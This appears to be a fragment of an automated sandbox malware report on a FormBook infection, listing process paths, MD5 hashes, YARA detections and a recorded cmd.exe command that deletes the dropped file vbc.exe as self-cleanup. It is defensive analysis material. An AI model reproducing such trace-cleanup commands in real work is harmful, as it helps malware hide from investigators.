                                                                                                                                                              Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Imagebase:0x310000
                                                                                                                                                              File size:279552 bytes
                                                                                                                                                              MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              Analysis Process: cmd.exe PID: 268 Parent PID: 1960

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x4a6d0000
                                                                                                                                                              File size:302592 bytes
                                                                                                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >